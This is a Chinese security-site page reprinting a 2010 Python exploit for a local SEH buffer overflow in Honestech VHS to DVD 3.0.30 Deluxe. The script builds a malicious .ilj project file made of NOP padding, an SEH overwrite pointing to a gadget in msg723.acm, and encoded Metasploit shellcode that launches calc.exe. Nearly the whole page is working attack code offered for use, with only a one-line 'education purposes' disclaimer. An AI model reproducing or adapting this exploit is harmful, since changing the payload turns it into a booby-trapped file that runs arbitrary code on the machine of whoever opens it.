首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
来源:thomab310@gmail.com 作者:Thomas 发布时间:2010-09-17  

#!/usr/bin/python
#
# Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Date: September 16, 2010
# Author: Brennon Thomas thomab310@gmail.com
# Software Link: n/a
# Version: <= 3.0.30.0 Deluxe
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
#
# Usage: This python script generates the malicious .ilj project file.
# Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and
# load the corrupt file.
#
# Exploit is for education purposes only.  Author takes no responsibility
# for what you do with it.

#Required file text
buf = "\r\n\
\r\n\
<CAPTURE>\r\n\
\r\n\
[MAINDLG]\r\n\
PAGE=0\r\n\
\r\n\
[AVICODEC]\r\n\
VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)\r\n\
AUDIOCODEC=MPEG Layer-3\r\n\
\r\n\
[WMVINFO]\r\n\
TITLE=  \r\n\
AUTHOR=  \r\n\
COPYRIGHT=  \r\n\
DESCRIPTION=  \r\n\
\r\n\
[CAPTUREINFO]\r\n\
OUTPUTFOLDER=E:\\misc\\\r\n\
STATE=0,1,1,0,4396,4,1,0,0\r\n\
\r\n\
[BURNINFO]\r\n\
STATE=0,0,0,0,0,0\r\n\
TEMPFOLDER=E:\\misc\\\r\n\
VIDEOTSFOLDER=E:\\misc\\\r\n\
IMAGEFOLDER=E:\\misc\\\r\n\
\r\n\
[FILELIST]\r\n\
FILE=E:\\"

buf += "\x90"*257         #Junk
buf += "\xeb\x08\x90\x90" #JMP SHORT 8, NOP Padding
buf += "\xba\x25\x31\x58" #SEH Overwrite to POP,POP,RETN in msg723.acm
buf += "\x90"*16          #NOP Buffer

#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x2c' -t c
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
buf += ("\xbe\xf9\x89\xfa\xaa\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x5d\x31\x75\x13\x83\xed\xfc\x03\x75\xf6\x6b\x0f\x56\xe0\xe5"
"\xf0\xa7\xf0\x95\x79\x42\xc1\x87\x1e\x06\x73\x18\x54\x4a\x7f"
"\xd3\x38\x7f\xf4\x91\x94\x70\xbd\x1c\xc3\xbf\x3e\x91\xcb\x6c"
"\xfc\xb3\xb7\x6e\xd0\x13\x89\xa0\x25\x55\xce\xdd\xc5\x07\x87"
"\xaa\x77\xb8\xac\xef\x4b\xb9\x62\x64\xf3\xc1\x07\xbb\x87\x7b"
"\x09\xec\x37\xf7\x41\x14\x3c\x5f\x72\x25\x91\x83\x4e\x6c\x9e"
"\x70\x24\x6f\x76\x49\xc5\x41\xb6\x06\xf8\x6d\x3b\x56\x3c\x49"
"\xa3\x2d\x36\xa9\x5e\x36\x8d\xd3\x84\xb3\x10\x73\x4f\x63\xf1"
"\x85\x9c\xf2\x72\x89\x69\x70\xdc\x8e\x6c\x55\x56\xaa\xe5\x58"
"\xb9\x3a\xbd\x7e\x1d\x66\x66\x1e\x04\xc2\xc9\x1f\x56\xaa\xb6"
"\x85\x1c\x59\xa3\xbc\x7e\x34\x32\x4c\x05\x71\x34\x4e\x06\xd2"
"\x5c\x7f\x8d\xbd\x1b\x80\x44\xfa\xd3\xca\xc5\xab\x7b\x93\x9f"
"\xe9\xe6\x24\x4a\x2d\x1e\xa7\x7f\xce\xe5\xb7\xf5\xcb\xa2\x7f"
"\xe5\xa1\xbb\x15\x09\x15\xbc\x3f\x6a\xf8\x2e\xa3\x43\x9f\xd6"
"\x46\x9c\x55")

buf += "\x90"*(6000-(len(buf))) #NOP Buffer
buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text

f = open("sploit.ilj", "w")
f.write(buf)
f.close()
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chalk Creek Media Player 1.0.7
·x86_64 Linux Kernel ia32syscal
·Linux Kernel 2.6.27+ x86_64 co
·BACnet OPC Client Buffer Overf
·xp_hello.dll(sa) 提权工具
·Integard Pro 2.2.0.9026 (Win7
·vBulletin vbseo.php本地文件包
·Firefox Plugin Parameter Ensur
·win32/xp sp3 (Tr) calc.exe She
·DJ Studio Pro Version 8.1.3.2.
·win32/xp sp3 (Tr) Create New F
·MediaHuman Music Converter 1.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved